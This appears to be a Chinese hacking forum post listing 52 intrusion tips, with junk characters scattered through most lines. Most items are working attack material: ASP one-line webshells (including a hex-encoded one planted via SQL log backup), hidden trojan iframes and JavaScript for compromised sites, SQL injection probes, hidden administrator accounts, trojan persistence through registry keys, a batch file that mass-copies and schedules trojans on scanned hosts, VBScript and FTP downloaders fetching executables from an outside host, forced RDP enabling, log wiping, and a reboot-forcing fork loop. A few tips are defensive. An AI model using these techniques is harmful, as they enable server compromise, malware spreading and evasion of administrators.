Xp系统修改权限防止病毒或木马等破坏系统,cmd下," Y- k9 y0 n6 Z* o
cacls C:\windows\system32 /G hqw20:R
% r# ~$ [# a5 m1 A3 E% Q& }思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
! A- g9 p& Q ?2 b# M恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
0 t) z c( U4 \
$ ^" A& W$ v k! H0 J2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
4 a7 O. w' E8 z1 U0 X! G9 e: H& m' S) W! ~; e Z
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
# q+ G8 v4 F! z! _! Q% J1 b, F, i1 j" J9 j+ G
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
1 x. o4 e6 X6 |& n/ i6 F$ _; ` p
: p5 K* d* i; m# `0 l! d2 T% l+ g9 f5、利用INF文件来修改注册表
% {5 Y* u) y; z[Version]& l. r' \$ x6 b7 l% J
Signature="$CHICAGO$"' n0 W* l1 p S+ Z$ O6 b0 g
[Defaultinstall]% t: t; _ p/ x: l
addREG=Ating
& U! T; Z1 P+ b0 k+ d# }% p3 s! W[Ating]/ W! K' ]; ] Q- f
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
7 f1 R5 Z! U5 H' y5 k. F9 s8 D以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:3 M5 k4 [; J+ [" h! ]' l5 b: Z
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径9 e+ O. [) k0 y. M
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
: I' \* C9 @% ^5 }5 i$ iHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU" D% p+ k8 {0 o0 B4 @
HKEY_CURRENT_CONFIG 简写为 HKCC/ @, i: r- _9 Z
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
/ B; ^3 v1 r- x$ ] O2 ^' k- O"1"这里代表是写入或删除注册表键值中的具体数据* D# Y7 Z# ?# p
( D$ p4 Y7 g: I5 C
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
$ |7 |* \6 [3 \1 {: [" F多了一步就是在防火墙里添加个端口,然后导出其键值
( o8 j: U( a3 |2 h7 S5 a[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]. j3 b2 y; S9 `+ z3 ]6 L4 T- {/ G
5 D* V+ Q& t# w) t
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽# H# ^2 Z1 ?$ F$ W+ k; r
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。$ Q" f0 T* W- h6 h6 n+ }
& \$ F9 |/ c" R2 m$ t8 o8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
3 v, p0 o7 R) o) h
9 _4 Y. \! m- i+ z9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
; W1 q5 m. h3 M ^可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
* y3 Z9 \* `' b7 d6 t3 }5 q
( J; G0 g$ Q; K4 D, ?& {10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
6 y/ y+ f ~( a( W( s$ | a3 j
# K+ p$ g% V5 k* J( @0 q11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
# h: Q5 M6 Q3 B, a% X$ L' m/ A用法:xsniff –pass –hide –log pass.txt
! v4 C* ?( ?/ {' A) J3 ^( h5 t3 J' X, {$ d$ q6 [
12、google搜索的艺术5 f6 A* T K* v9 i6 s& } M2 w
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
6 P4 z: K# v1 K. T5 n# c7 k0 w或“字符串的语法错误”可以找到很多sql注入漏洞。0 q% Z0 S! z7 c0 p/ _- b
7 z- y' p4 d+ [13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
1 H% m( a) N3 t3 O' A3 P( E7 z. n- S$ G Z3 y3 r/ Y, V
14、cmd中输入 nc –vv –l –p 1987% o G& |$ @8 D+ ?
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃" q* j) J6 }- @5 Z2 ] l
1 c4 g2 u* s9 S) U6 f15、制作T++木马,先写个ating.hta文件,内容为* X4 ^/ W& E0 O8 } ?6 g
<script language="VBScript">
- _2 s, b3 V) u0 s; Sset wshshell=createobject ("wscript.shell" )
- g' O% M2 M& i! A5 ^. w7 u6 }a=wshshell.run("你马的名称",1)
; d* X8 L- O) o. n- n' e Rwindow.close
! A) x6 @2 z( L D0 n9 k; g</script>
; ~/ h# n# Q2 m' J! \再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。 f0 E0 `8 v+ r
9 A8 @' g, J# G" W2 {, V% b7 C16、搜索栏里输入
: M; U# `* `0 D5 K7 O关键字%'and 1=1 and '%'='* m4 L' D/ y1 B& ^6 U6 ?# ]) I
关键字%'and 1=2 and '%'=': W6 J' u. f# r c/ f" ^( z8 U
比较不同处 可以作为注入的特征字符
9 C& P' w4 f1 c8 F6 n8 r* V' U s5 d3 C
17、挂马代码<html>3 Y' w0 h8 M ?& p2 }, f9 i
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>! x+ l8 P8 a7 ?, ?( d4 z
</html>+ K0 D: b6 |1 R9 R
$ E# H8 w! ]* K- I$ c. k4 m5 [
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
1 n5 q& ]2 ^0 Y+ ^net localgroup administrators还是可以看出Guest是管理员来。1 G8 F, h" X1 |& F, l
5 N0 F- k9 `( o& j" P) |9 J; _19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
. F6 K' k: c l0 j* ]2 {用法: 安装: instsrv.exe 服务名称 路径
9 [5 e: R; E0 y7 R2 h卸载: instsrv.exe 服务名称 REMOVE* }6 T }0 P% b s/ }7 r
7 p: w9 Q8 `& H9 f/ M i
. j- h2 S3 D/ i3 Q( F/ ]9 R& _8 ?
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉" w% w* g t( ? i T
不能注入时要第一时间想到%5c暴库。3 F% z, e% U$ l6 ^) ^4 a( \
! o& f9 ^; H8 @& P22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~2 j0 A. S! R6 Y) L- c
8 c! W/ b! P5 n; E) Q R$ J23、缺少xp_cmdshell时
# H( L2 x# i6 a3 L, h尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll', U- v4 ?, k9 K/ e9 K5 V
假如恢复不成功,可以尝试直接加用户(针对开3389的)" \6 Y1 w5 ^2 M- ~% o* m2 _
declare @o int Y5 a7 I" ?! c3 `, b
exec sp_oacreate 'wscript.shell',@o out
% `; q" J) R. Oexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员 t% @8 C) u7 b( Q
; b; b% J& q! Q2 u9 n1 M! s b; f% N
24.批量种植木马.bat
6 u2 d- I- _) t+ cfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
+ a- R) O& h$ F6 S7 dfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
, b9 `9 P) F9 U9 i/ D6 x扫描地址.txt里每个主机名一行 用\\开头
0 t _+ M5 R& n- B8 E) K
& K9 |$ |, z* q$ \3 v5 T. P/ H25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
8 [6 ^. \! Z7 }. f3 U; o5 K5 o" a
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
8 t3 g; y9 g& L! j+ D将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.6 k; Q; a3 N! O0 N2 `+ K; X# }7 `9 D
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
' h% `1 I& o* D/ ^/ q( a- ^
- W% u4 X9 k: K3 n/ |27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
- L0 }" @ B* x0 z9 N然后用#clear logg和#clear line vty *删除日志2 H! D) e2 y( E! K' ^0 w
* G& c: h: K' i. Y1 i% d28、电脑坏了省去重新安装系统的方法
1 n8 ?8 z$ H! A; Z- |3 B+ R纯dos下执行,
$ \! y: g: |2 K, `9 yxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config: c+ ^0 {8 W& E3 A% j! {
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
- {- m& R& y* i* {3 I$ Y+ W
8 b1 ~. b3 J1 W. ^$ i8 d+ K3 f29、解决TCP/IP筛选 在注册表里有三处,分别是:
1 d) e, q& O7 p$ M/ X9 |0 EHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip2 m4 ?* _2 ?. v
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
+ e/ ] \5 ] l( F5 AHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip3 R3 w( b8 P$ ^8 o* q% A% H1 {: \
分别用- p3 Q6 E3 F+ q; C" F9 Z
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip r9 v; I7 T& M) c9 v
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
4 _) z+ A3 X0 D/ P& g pregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
) U+ Y, g# v4 l, D/ Y: R命令来导出注册表项0 D( T( z+ x+ V3 T2 r% H
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
8 ]& }' W# l$ y& B$ w8 c改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用! g" a, O9 ?& C2 ]* R% ?, S; q) i
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
0 |6 K# x8 b) b5 K& x0 O
" b4 i; ^1 o: l; p% O8 F30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U% w" q* h+ M/ L4 f! G8 M
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
4 ^$ e& ~. v2 P; a- Z" K. [0 \7 N# s
: i7 P8 z+ ?# |/ D' L31、全手工打造开3389工具. [( [' j- {' O* d9 w2 V: F2 {
打开记事本,编辑内容如下:& I' X2 p7 D8 K9 J* ?7 z ~7 J7 L
echo [Components] > c:\sql
) ^" D0 T2 K1 m4 Oecho TSEnable = on >> c:\sql1 \" p/ Q/ D6 L0 I! }) }
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
6 r5 Y1 Y/ x) c编辑好后存为BAT文件,上传至肉鸡,执行; B! ~' @/ j6 V8 ~& O" y3 q* A( n
. K- K% j8 H6 `4 t" y+ D+ Q
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
2 t6 t, u! \4 ?" k" f3 s1 ^) [/ z- t( U
33、让服务器重启3 K0 T: B. l! w0 p
写个bat死循环:
8 v5 X% H, ^# G% `@echo off+ u- w0 j5 |" o5 B, W5 @" \
:loop1
5 F% w6 |# B9 f* x/ Z1 Gcls2 f) t2 q+ s) Z
start cmd.exe
2 B+ \% I+ v+ I4 X$ zgoto loop1) P% S" `, p/ _# r4 l
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
+ }& }; V. w; x9 I4 O% I, w3 w6 O" z
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
! {2 R& U" |/ l$ d) U4 H% Z@echo off8 H7 ^6 G0 T1 h: ~ M; M0 O2 O/ d
date /t >c:/3389.txt
* T) W. O: b& v/ v5 f7 htime /t >>c:/3389.txt
: x7 L, E+ \+ _2 Q. rattrib +s +h c:/3389.bat
! ?$ A k8 }9 O$ vattrib +s +h c:/3389.txt6 G: i \2 O2 @
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt3 f7 M+ X' a8 S }3 j! s F) W/ Q, M
并保存为3389.bat$ j. D& C+ K5 v8 S# _5 E1 Y& }
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
4 A- d) M) G; Y- X" L) c/ e0 Z+ H7 d& C
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
, t C7 c5 w1 w! U9 bstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)( T' i- o4 t! x/ ?5 R. o6 U% P$ T
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。2 g, j8 ]" w+ m$ H$ d0 z( P
( B- T4 ?" w4 H$ n2 O
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
6 ~- l8 |: z6 c6 B+ ?3 ^3 W1 aecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
% X: h# R; I) F0 c. }. s! D7 k! {echo 你的FTP账号 >>c:\1.bat //输入账号
! j. a* C! L" _$ e6 cecho 你的FTP密码 >>c:\1.bat //输入密码
5 G9 v8 K1 S0 Y6 I( Decho bin >>c:\1.bat //登入
; H5 r0 ^: f. g! x4 B( i/ ^echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
# ?; x8 b2 S. iecho bye >>c:\1.bat //退出; p! z$ a* B b8 B
然后执行ftp -s:c:\1.bat即可
- F$ S8 Y; d1 j6 ^' y/ A
! {; q( U' S" ^$ U' q6 d37、修改注册表开3389两法# X% a$ f+ b: q
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
+ K3 {, q$ T0 E7 _echo Windows Registry Editor Version 5.00 >>3389.reg5 M! Y8 J1 m+ S
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
2 ^( O5 t, W: vecho "Enabled"="0" >>3389.reg7 i' m7 f$ r( ^) Z4 D8 b9 j2 q
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
, O* y+ F& ?3 E' R0 i+ a7 WNT\CurrentVersion\Winlogon] >>3389.reg3 O- o1 a0 V( g& Y6 g) b
echo "ShutdownWithoutLogon"="0" >>3389.reg
0 X+ f% U9 q/ m; u* q! pecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
- f! {( u# ] Y# q& S>>3389.reg
( `* g$ q. t/ ^. F ^; g6 ?+ [; Yecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
9 R4 m9 F' ?& vecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]3 F. x1 j# D% Q8 n2 N3 l" u% A8 b
>>3389.reg
! K1 a7 R0 X) Hecho "TSEnabled"=dword:00000001 >>3389.reg _7 ^$ w; P0 Z- l1 u0 P
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg! q ^* |& E/ f7 B5 q- n
echo "Start"=dword:00000002 >>3389.reg( K" X8 F" |/ J! [0 g2 e* j
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]9 C. m& q6 {. [1 o
>>3389.reg
! k8 u, H# l* X+ y& i( e; K$ Aecho "Start"=dword:00000002 >>3389.reg3 S' K! L. B, J" ^% ^3 E
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg8 g1 b# d4 ]) H# k& g
echo "Hotkey"="1" >>3389.reg4 ?, S7 I: o' K- w8 K! F
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal% b* H$ j, W" Y/ d
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
; U3 |0 {, q: I+ R; s* o Recho "PortNumber"=dword:00000D3D >>3389.reg& b1 u8 V) m0 P _& @
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal: ^( Q* Q/ D4 @' x; ?
Server\WinStations\RDP-Tcp] >>3389.reg
* D0 n. k+ Y; o+ c- ~/ C3 Eecho "PortNumber"=dword:00000D3D >>3389.reg
! |4 }5 S# U# X把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
' c( p i# C- |9 _5 z$ j(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)6 l0 t9 t4 g q
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
' X+ Y+ _: s. {7 a(2)winxp和win2003终端开启& i% Q" m! }2 x4 u5 V
用以下ECHO代码写一个REG文件:2 j) S3 K; s' I6 a0 Z& n6 f' U
echo Windows Registry Editor Version 5.00>>3389.reg
, b, Y2 |' s# C Fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
, U, d |& V- `, v/ |7 ?Server]>>3389.reg# }) ^: d5 q% f% y3 Y* ^# @
echo "fDenyTSConnections"=dword:00000000>>3389.reg
' M( }) K' N0 j9 ^, v( qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal' d' Q. }( e# g& A6 H/ x- Y4 V
Server\Wds\rdpwd\Tds\tcp]>>3389.reg4 S$ U1 p& m# y
echo "PortNumber"=dword:00000d3d>>3389.reg
& _: M5 U: n3 a! X- }7 [9 b' ^echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
2 f6 K0 a8 V% `. VServer\WinStations\RDP-Tcp]>>3389.reg
: C, K+ O% m1 H, N; N8 Uecho "PortNumber"=dword:00000d3d>>3389.reg+ @" Q2 Z8 C! ]/ U
然后regedit /s 3389.reg del 3389.reg
, o8 [3 @: o0 r, M7 |& {2 RXP下不论开终端还是改终端端口都不需重启# ~* y$ Q6 `0 Y+ N1 b
' W- N8 F, a' i3 R2 C) M; V
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃/ Y! z' H5 D0 z9 a, |, `
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
. p0 Y* l: x( n% s) D0 I- V% i% V( F: Q
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!- S7 a4 O9 X* r1 R) S; P! `, j
(1)数据库文件名应复杂并要有特殊字符
% G* E; Z5 b" r# V& |& A(2)不要把数据库名称写在conn.asp里,要用ODBC数据源) A+ q: ]* q2 @+ K. O8 g
将conn.asp文档中的
f* o1 c) x) D1 zDBPath = Server.MapPath("数据库.mdb")
% d7 G0 L+ |; W# V( }5 \( vconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
8 T9 r, t, v5 C4 x$ _% G) x
. `9 a( y B: h! W4 o F: z修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置( T( g, O! }' O) K' y0 j# f, e
(3)不放在WEB目录里" q* @. u+ Z c( e5 O; f
F- R. k0 o1 L. V- ?2 J( Q
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
, m8 X1 [- @0 O2 d/ h$ ?* K可以写两个bat文件
1 i& D$ `" |4 z& F@echo off
$ L8 R+ a4 S+ u@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
( P( s4 d( n# r@del c:\winnt\system32\query.exe- {( N/ l; a M
@del %SYSTEMROOT%\system32\dllcache\query.exe8 G) V& Y* @5 Q! X! f/ t, o2 q
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
) I4 J v3 Z* x6 N" z
0 W' ` T5 A3 W7 k1 k& p@echo off5 A7 [5 G& S3 k( J# w) I
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
2 u/ i& E- J8 l2 B w@del c:\winnt\system32\tsadmin.exe. h" P( e9 F( B7 \; q
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
5 @; w1 u. f6 l, z, A1 x% U9 w% `' ~$ d9 r1 |/ z: K0 V ^4 r
41、映射对方盘符
9 F4 s% Z" U6 x, n# S7 ftelnet到他的机器上,
+ n+ [ U9 n6 Z: [1 f- L! d7 Dnet share 查看有没有默认共享 如果没有,那么就接着运行
( T4 t5 F4 |9 D. d: x+ bnet share c$=c:: w( g) h! M& r# a
net share现在有c$- @( v5 W3 v5 ]1 s, V% k
在自己的机器上运行
; r. L* F" k% _ \net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K/ F4 d) t, c( b
5 B/ f. T7 X( U# W3 J2 A
42、一些很有用的老知识9 u! J$ N6 `( i
type c:\boot.ini ( 查看系统版本 )
" k) s4 r' n: Fnet start (查看已经启动的服务)8 c, ?6 ]5 P; a/ w6 R' Q) L2 R6 W
query user ( 查看当前终端连接 )& a' i& N8 f+ M; S# G3 A& J
net user ( 查看当前用户 )3 I. V& Q: w& }, x
net user 用户 密码/add ( 建立账号 )
2 ]$ v8 W& g# O" @( {' Nnet localgroup administrators 用户 /add (提升某用户为管理员)+ `3 m& C/ W% w
ipconfig -all ( 查看IP什么的 ), K9 f# g+ Y: T' ~" L6 O. ]0 b
netstat -an ( 查看当前网络状态 )
; }) C7 O+ T4 @0 }$ ufindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)4 [& x4 i! @1 {" X+ r
克隆时Administrator对应1F4
4 U9 E8 @# T# V5 O4 ]guest对应1F57 { u0 y# U' d% p. D7 Q! g
tsinternetuser对应3E8
( }9 H: r' U, T ?( O5 ]2 M
6 u) M1 e5 [2 z5 }5 Z- H6 c/ x6 ]43、如果对方没开3389,但是装了Remote Administrator Service
$ e! z0 [' [3 d: W用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接3 A) u% Y, f6 z* _2 J3 K2 j% S' }1 r
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
8 T3 W5 M w+ N0 s( G& k先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"/ f( `* ]7 M) e/ \7 g, J, H
4 u9 G3 F8 Y m44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
7 W/ h* ]+ C" x' R/ N& c! K, u本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)8 x3 @+ b9 v: Z8 F% d
" L' s1 r7 ~% r+ B( |
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入): G4 ~9 z* J; F0 f8 \
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open- k! f' ]8 B& T
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
3 z" U- e1 g6 i' tCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
% p, \, d, w! w1 x& ?8 T& ^2 E1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
' Q. g) w9 M5 n# f: J1 k+ w(这是完整的一句话,其中没有换行符)" W. Z0 W/ x3 F, y3 W/ s
然后下载:
4 r' H% E+ S6 k: d& icscript down.vbs http://www.hack520.org/hack.exe hack.exe H9 a8 w5 l1 t5 w& m
- v/ g* H. e. G @6 T
46、一句话木马成功依赖于两个条件:& b' B! n+ k5 Q# N! z
1、服务端没有禁止adodb.Stream或FSO组件1 y, O3 g, o7 r: b6 }) h
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
8 h7 a* m* H/ x/ Z+ }
0 x$ d2 H8 y2 C [% L47、利用DB_OWNER权限进行手工备份一句话木马的代码:4 `$ ]9 p5 v3 U2 l
;alter database utsz set RECOVERY FULL--1 P- A# x, I$ {% k
;create table cmd (a image)--
- w- D+ A B7 Y* v3 D };backup log utsz to disk = 'D:\cmd' with init--& l5 F1 R+ J9 w# v% H6 F
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
f# J5 ?- E/ A/ `1 _+ w& x;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
7 h0 g. T/ E9 @4 M) T9 z' u注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。+ w3 y! S! J- V# ^ w$ Z
8 H. d6 a2 L# a- {48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
% ` r3 z2 T) P8 {/ d q0 O) h' ?6 `* z' t! ]
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options/ R, u/ X0 C! i& m+ E
所有会话用 'all'。. B7 q' Z$ O& V* D3 J% d7 P
-s sessionid 列出会话的信息。- y% W2 e: J% }1 s* n, r+ y
-k sessionid 终止会话。
5 V: t0 r: X0 U \1 ?. n-m sessionid 发送消息到会话。
) k( R( ^/ o+ F1 C
5 q( L4 P }8 Oconfig 配置 telnet 服务器参数。
[2 ^; Y4 `' o- ?* X( ]% r" N" g# e/ k+ l& U5 q, L
common_options 为:
6 R: ~( n4 J" Q( l/ ^$ n-u user 指定要使用其凭据的用户* Z8 T" J* ~, J6 X" `, j+ V2 m Y
-p password 用户密码! d+ r; w- D% t# D0 }0 s
4 F" j. y O. J) [+ mconfig_options 为:. i: {8 L$ X. Z" G9 \
dom = domain 设定用户的默认域
$ ]- D" k/ z+ n2 Fctrlakeymap = yes|no 设定 ALT 键的映射0 _4 s5 @1 y" ^/ p& Z8 Z' Y
timeout = hh:mm:ss 设定空闲会话超时值( E8 w/ M" m- a. R
timeoutactive = yes|no 启用空闲会话。
3 ~- R" P; _; ymaxfail = attempts 设定断开前失败的登录企图数。
3 N1 D. [6 S. O2 _( ^9 g4 r0 ^) Fmaxconn = connections 设定最大连接数。
0 ^# c, w) o6 [8 y6 r8 H6 V0 X( N$ G2 Bport = number 设定 telnet 端口。( g' u4 n( g3 S; C# |
sec = [+/-]NTLM [+/-]passwd
6 W$ K* n( V* ^5 x设定身份验证机构$ H: n% l5 w% b& x, W0 f. d
fname = file 指定审计文件名。
. z; Q; Q9 l3 f( C; b# wfsize = size 指定审计文件的最大尺寸(MB)。0 R7 u0 ~+ x6 H4 ]
mode = console|stream 指定操作模式。
3 W" w/ c. {) v' J5 y$ m. Uauditlocation = eventlog|file|both/ ~( Z b" V; C8 M$ C# L) S
指定记录地点) G( f, x( L8 Z5 E7 _
audit = [+/-]user [+/-]fail [+/-]admin
( d; S. Y# v# j/ g4 _; |% l5 ?( n
49、例如:在IE上访问:
. W+ q o K: Wwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
7 a: }8 G. y- J! i$ nhack.txt里面的代码是:
' B% x( c3 i1 V7 ]7 L6 }<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">1 B9 i) D0 b$ S, M. r' a
把这个hack.txt发到你空间就可以了!
* U& S! K; M8 }) b' v% E2 _这个可以利用来做网马哦!+ u6 F, N/ r, X& h& w% B3 U
( i& G4 @1 Y! v
50、autorun的病毒可以通过手动限制!) v2 M0 t1 j7 a- m- q) z
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
# P; p" M% E& Q; n* @( P2,打开盘符用右键打开!切忌双击盘符~5 q& W, {6 w: [& a) X
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
& Q, V: V. l$ Q2 f3 c$ B7 U/ m
51、log备份时的一句话木马:- F! h3 }- S. n) R$ Q
a).<%%25Execute(request("go"))%%25>
2 l+ J- J4 J4 ]' Z# _ y; L. Mb).<%Execute(request("go"))%>5 x. D- ~0 ~: t7 k* ]
c).%><%execute request("go")%><%/ v" e/ r, |7 N# K4 d, m
d).<script language=VBScript runat=server>execute request("sb")</Script>( q( p- N( x* T
e).<%25Execute(request("l"))%25>9 B% T" B# S/ C- f K. b7 k
f).<%if request("cmd")<>"" then execute request("pass")%>
# }7 C: T! ?5 y5 Q/ z4 [: t" X' _% E9 }
52、at "12:17" /interactive cmd
/ d! g; c' ]$ Y& J0 n! V4 W! |% ~执行后可以用AT命令查看新加的任务: Z( \- r1 ~7 Y8 W6 X
